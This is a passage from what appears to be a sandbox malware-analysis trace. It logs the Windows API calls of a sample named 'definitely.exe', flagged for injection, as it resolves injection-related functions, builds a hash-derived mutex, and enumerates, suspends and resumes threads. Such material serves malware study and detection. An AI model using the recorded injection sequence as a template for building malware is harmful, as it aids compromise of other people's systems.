(hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.843] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.844] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.844] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.844] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.845] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.845] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.845] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.845] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.846] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.846] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.846] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.847] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.847] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.847] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.847] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.848] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.848] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.848] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.849] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.849] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.849] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.850] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.850] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.850] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.850] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.851] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.851] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.851] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.852] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.852] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.852] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.852] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.853] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.853] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.853] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.854] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.854] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.854] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.855] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.855] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.855] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.855] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.856] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.856] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.856] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.857] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.857] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.857] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.863] ResumeThread (hThread=0x280) returned 0x1 [0167.863] CloseHandle (hObject=0x280) returned 1 [0167.864] ResumeThread (hThread=0x280) returned 0x1 [0167.864] CloseHandle (hObject=0x280) returned 1 [0167.864] ResumeThread (hThread=0x280) returned 0x1 [0167.864] CloseHandle (hObject=0x280) returned 1 [0167.864] ResumeThread (hThread=0x280) returned 0x1 [0167.869] CloseHandle (hObject=0x280) returned 1 [0167.870] ResumeThread (hThread=0x280) returned 0x1 [0167.870] CloseHandle (hObject=0x280) returned 1 [0167.870] ResumeThread (hThread=0x280) returned 0x1 [0167.870] CloseHandle (hObject=0x280) returned 1 [0167.870] ResumeThread (hThread=0x280) returned 0x1 [0168.047] CloseHandle (hObject=0x280) returned 1 [0168.047] ResumeThread (hThread=0x280) returned 0x1 [0168.047] CloseHandle (hObject=0x280) returned 1 [0168.047] ResumeThread (hThread=0x280) returned 0x1 [0168.047] CloseHandle (hObject=0x280) returned 1 [0168.048] ResumeThread (hThread=0x280) returned 0x1 [0168.048] CloseHandle (hObject=0x280) returned 1 [0168.178] VirtualQuery (in: lpAddress=0x181510, lpBuffer=0x290fe20, dwLength=0x30 | out: lpBuffer=0x290fe20*(BaseAddress=0x181000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x68000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0168.178] GetProcessHeap () returned 0x150000 [0168.178] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x181510 | out: hHeap=0x150000) returned 1 [0168.178] VirtualQuery (in: lpAddress=0x19d3f0, lpBuffer=0x290fe20, dwLength=0x30 | out: lpBuffer=0x290fe20*(BaseAddress=0x19d000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0168.178] GetProcessHeap () returned 0x150000 [0168.178] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x19d3f0 | out: hHeap=0x150000) returned 1 [0168.178] RtlExitUserThread (Status=0x0) Process: id = "23" image_name = "definitely.exe" filename = "c:\\program files (x86)\\microsoft analysis services\\definitely.exe" page_root = "0x67397000" os_pid = "0x780" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "16" os_parent_pid = "0x958" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Analysis Services\\definitely.exe\" " cur_dir = "C:\\Program Files (x86)\\Microsoft Analysis Services\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 228 os_tid = 0x9cc Thread: id = 229 os_tid = 0x6bc Thread: id = 230 os_tid = 0xa1c [0166.278] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0166.278] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0166.278] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0166.278] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0166.278] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0166.279] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0166.279] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0166.279] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0166.279] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0166.279] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0166.279] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0166.279] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0166.279] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0166.279] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0166.279] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0166.279] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0166.279] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0166.280] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0166.280] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0166.280] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0166.280] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0166.280] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0166.280] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0166.280] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0166.280] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0166.280] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0166.280] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0166.280] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0166.280] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0166.281] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0166.281] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0166.281] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0166.281] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0166.281] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0166.281] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0166.281] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0166.281] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0166.281] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0166.281] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0166.281] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0166.281] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0166.282] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0166.282] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0166.282] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0166.282] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0166.282] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0166.282] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0166.288] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0166.288] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0166.288] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0166.294] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0166.294] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0166.294] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0166.294] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0166.294] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0166.294] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0166.294] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0166.294] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0166.294] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0166.294] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0166.295] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0166.295] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0166.297] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0166.297] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0166.297] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0166.297] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0166.297] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0166.298] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0166.298] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0166.298] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0166.298] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0166.298] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0166.298] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0166.298] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0166.298] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0166.298] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0166.298] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0166.298] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0166.298] VirtualProtect (in: lpAddress=0x70000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x233fa0c | out: lpflOldProtect=0x233fa0c*=0x40) returned 1 [0166.299] VirtualProtect (in: lpAddress=0x70000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x233fa0c | out: lpflOldProtect=0x233fa0c*=0x4) returned 1 [0166.300] VirtualQuery (in: lpAddress=0x80016, lpBuffer=0x233fa04, dwLength=0x1c | out: lpBuffer=0x233fa04*(BaseAddress=0x80000, AllocationBase=0x80000, AllocationProtect=0x40, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0166.300] GetProcessHeap () returned 0x560000 [0166.300] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x364) returned 0x580600 [0166.300] RtlMoveMemory (in: Destination=0x580600, Source=0x80016, Length=0x363 | out: Destination=0x580600) [0166.300] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0166.300] GetCurrentProcessId () returned 0x780 [0166.300] GetProcessHeap () returned 0x560000 [0166.300] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x105) returned 0x580970 [0166.300] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x580970, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Microsoft Analysis Services\\definitely.exe" (normalized: "c:\\program files (x86)\\microsoft analysis services\\definitely.exe")) returned 0x41 [0166.300] GetProcessHeap () returned 0x560000 [0166.300] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x105) returned 0x580a80 [0166.300] GetCurrentProcessId () returned 0x780 [0166.300] wsprintfA (in: param_1=0x580a80, param_2="%s%d%d%d" | out: param_1="C:\\Program Files (x86)\\Microsoft Analysis Services\\definitely.exe37084212419203") returned 79 [0166.300] CryptAcquireContextA (in: phProv=0x233fa08, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x233fa08*=0x580bd0) returned 1 [0166.315] CryptCreateHash (in: hProv=0x580bd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x233fa0c | out: phHash=0x233fa0c) returned 1 [0166.315] lstrlenA (lpString="C:\\Program Files (x86)\\Microsoft Analysis Services\\definitely.exe37084212419203") returned 79 [0166.315] CryptHashData (hHash=0x581508, pbData=0x580a80, dwDataLen=0x4f, dwFlags=0x0) returned 1 [0166.315] CryptGetHashParam (in: hHash=0x581508, dwParam=0x2, pbData=0x233f9f8, pdwDataLen=0x233fa10, dwFlags=0x0 | out: pbData=0x233f9f8, pdwDataLen=0x233fa10) returned 1 [0166.315] wsprintfA (in: param_1=0x580a80, param_2="%02X" | out: param_1="E2") returned 2 [0166.315] wsprintfA (in: param_1=0x580a82, param_2="%02X" | out: param_1="5F") returned 2 [0166.315] wsprintfA (in: param_1=0x580a84, param_2="%02X" | out: param_1="75") returned 2 [0166.315] wsprintfA (in: param_1=0x580a86, param_2="%02X" | out: param_1="36") returned 2 [0166.315] wsprintfA (in: param_1=0x580a88, param_2="%02X" | out: param_1="9C") returned 2 [0166.315] wsprintfA (in: param_1=0x580a8a, param_2="%02X" | out: param_1="1B") returned 2 [0166.315] wsprintfA (in: param_1=0x580a8c, param_2="%02X" | out: param_1="22") returned 2 [0166.315] wsprintfA (in: param_1=0x580a8e, param_2="%02X" | out: param_1="50") returned 2 [0166.315] wsprintfA (in: param_1=0x580a90, param_2="%02X" | out: param_1="76") returned 2 [0166.315] wsprintfA (in: param_1=0x580a92, param_2="%02X" | out: param_1="E2") returned 2 [0166.315] wsprintfA (in: param_1=0x580a94, param_2="%02X" | out: param_1="CE") returned 2 [0166.315] wsprintfA (in: param_1=0x580a96, param_2="%02X" | out: param_1="7D") returned 2 [0166.315] wsprintfA (in: param_1=0x580a98, param_2="%02X" | out: param_1="A9") returned 2 [0166.316] wsprintfA (in: param_1=0x580a9a, param_2="%02X" | out: param_1="40") returned 2 [0166.316] wsprintfA (in: param_1=0x580a9c, param_2="%02X" | out: param_1="34") returned 2 [0166.316] wsprintfA (in: param_1=0x580a9e, param_2="%02X" | out: param_1="86") returned 2 [0166.316] CryptDestroyHash (hHash=0x581508) returned 1 [0166.316] CryptReleaseContext (hProv=0x580bd0, dwFlags=0x0) returned 1 [0166.316] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="E25F75369C1B225076E2CE7DA9403486") returned 0x80 [0166.316] GetLastError () returned 0x0 [0166.316] Sleep (dwMilliseconds=0x1f4) [0166.903] GetCurrentProcessId () returned 0x780 [0166.903] GetCurrentThreadId () returned 0xa1c [0166.903] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0166.906] Thread32First (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.906] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.906] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.906] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.907] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.907] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.907] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.908] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.908] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.908] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.908] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.909] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.909] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.909] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.910] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.910] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.910] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.910] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.911] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.911] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.911] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.912] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.912] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.912] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.912] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.913] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.913] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.913] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.914] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.914] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.914] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.914] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.915] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.915] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.915] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.916] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.916] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.916] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.916] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.917] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.917] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.917] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.918] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.918] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.918] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.918] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.919] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.919] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.919] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.920] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.920] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.920] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.920] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.921] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.921] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.921] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.922] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.922] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.922] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.922] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.923] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.923] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.923] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.924] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.924] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.924] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.924] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.925] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.925] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.925] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.925] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.926] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.926] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.926] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.927] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.927] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.927] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.927] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.928] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.928] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.928] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.929] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.929] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.929] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.929] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.930] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.930] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.930] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.931] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.931] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.931] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.931] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.932] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.932] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.932] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.933] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.933] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.933] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.933] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.934] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.934] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.934] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.935] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.935] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.935] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.935] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0166.936] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.073] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.073] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.074] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.074] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.074] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.075] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.075] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.075] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.075] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.076] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.076] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.076] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.077] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.077] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.077] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.077] Thread32Next (hSnapshot=0x88, 